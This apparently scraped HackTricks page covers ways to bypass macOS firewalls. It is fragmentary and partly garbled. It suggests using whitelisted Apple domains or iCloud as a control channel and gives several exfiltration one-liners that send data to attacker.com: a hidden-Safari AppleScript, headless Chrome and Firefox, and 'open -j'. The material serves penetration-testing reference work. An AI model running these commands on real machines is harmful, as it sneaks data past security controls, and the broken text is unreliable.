Search K
Appearance
Appearance
Other ways to support HackTricks:
The following techniques were found working in some macOS firewall apps.
launchdcurl, but also others like whoisThe firewall could be allowing connections to well known apple domains such as apple.com or icloud.com. And iCloud could be used as a C2.
Some ideas to try to bypass firewalls
Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them
lsof -i TCP -sTCP:ESTABLISHEDDNS resolutions are done via mdnsreponder signed application which will probably vi allowed to contact DNS servers.
.DWyxIPXe.png)
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"open -j -a Safari "https://attacker.com?data=data%20to%20exfil"If you can inject code into a process that is allowed to connect to any server you could bypass the firewall protections:
Other ways to support HackTricks: